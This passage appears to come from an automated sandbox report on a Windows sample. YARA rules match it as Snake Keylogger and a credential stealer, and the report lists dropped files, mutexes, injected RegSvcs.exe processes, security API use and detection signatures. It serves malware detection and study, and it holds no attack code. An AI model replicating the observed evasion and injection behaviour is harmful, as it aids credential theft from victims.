              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_03196730 | 7_2_03196730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319C751 | 7_2_0319C751
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319C470 | 7_2_0319C470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319BBD3 | 7_2_0319BBD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319CA31 | 7_2_0319CA31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_03194AD9 | 7_2_03194AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_03199858 | 7_2_03199858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319BEB0 | 7_2_0319BEB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_03193570 | 7_2_03193570
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0319B4F3 | 7_2_0319B4F3
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E0A0B9 | 8_2_00E0A0B9
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E00878 | 8_2_00E00878
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E013D0 | 8_2_00E013D0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E08379 | 8_2_00E08379
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E01C60 | 8_2_00E01C60
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E035A8 | 8_2_00E035A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E02698 | 8_2_00E02698
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E05000 | 8_2_00E05000
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E05928 | 8_2_00E05928
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E02118 | 8_2_00E02118
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E05919 | 8_2_00E05919
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E092D0 | 8_2_00E092D0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E092AD | 8_2_00E092AD
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E05BA0 | 8_2_00E05BA0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E05B90 | 8_2_00E05B90
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E05308 | 8_2_00E05308
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E044A8 | 8_2_00E044A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E04499 | 8_2_00E04499
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E08C70 | 8_2_00E08C70
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E08C29 | 8_2_00E08C29
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E05DA9 | 8_2_00E05DA9
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E016A0 | 8_2_00E016A0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E056A8 | 8_2_00E056A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E056B8 | 8_2_00E056B8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_00E04FF0 | 8_2_00E04FF0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09A6176C | 8_2_09A6176C
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09A61C68 | 8_2_09A61C68
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DBB1A8 | 8_2_09DBB1A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DB4840 | 8_2_09DB4840
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DB5AD0 | 8_2_09DB5AD0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DB5AE0 | 8_2_09DB5AE0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DB6478 | 8_2_09DB6478
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DB6468 | 8_2_09DB6468
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DB4408 | 8_2_09DB4408
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe | Code function: 8_2_09DB3FD0 | 8_2_09DB3FD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303B32812_2_0303B328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303610812_2_03036108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303C19012_2_0303C190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303C75212_2_0303C752
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303C47012_2_0303C470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303BBD212_2_0303BBD2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303CA3212_2_0303CA32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_03034AD912_2_03034AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303985812_2_03039858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303688012_2_03036880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303BEB012_2_0303BEB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303357212_2_03033572
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303B4F212_2_0303B4F2
              Source: file.exe Static PE information: invalid certificate
              Source: file.exe, 00000000.00000000.2130361419.00000000005B8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamexWoP.exe" vs file.exe
              Source: file.exe, 00000000.00000002.2190224781.00000000094A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
              Source: file.exe, 00000000.00000002.2185937260.00000000029E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2191673720.000000000A400000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000002.2190462455.0000000009667000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamexWoP.exe" vs file.exe
              Source: file.exe, 00000000.00000002.2186804007.0000000004226000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2185937260.0000000002D76000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
              Source: file.exe, 00000000.00000002.2183724547.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exe Binary or memory string: OriginalFilenamexWoP.exe" vs file.exe
              Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: aVmZDnwW.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, U--.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, U--.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, U--.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, U--.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, U--.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, U--.cs Cryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: _0020.SetAccessControl
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: _0020.AddAccessRule
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: _0020.SetAccessControl
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: _0020.AddAccessRule
              Source: 0.2.file.exe.a400000.6.raw.unpack, C346ht9Y1xxbI8GhL8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, C346ht9Y1xxbI8GhL8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4408da8.4.raw.unpack, C346ht9Y1xxbI8GhL8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: _0020.SetAccessControl
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.cs Security API names: _0020.AddAccessRule
              Source: classification engine Classification label: mal100.troj.evad.winEXE@26/12@2/2
              Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\aVmZDnwW.exe
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exe Mutant created: \Sessions\1\BaseNamedObjects\hCdDPxqnddhANFf
              Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\tmp9FE1.tmp
              Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
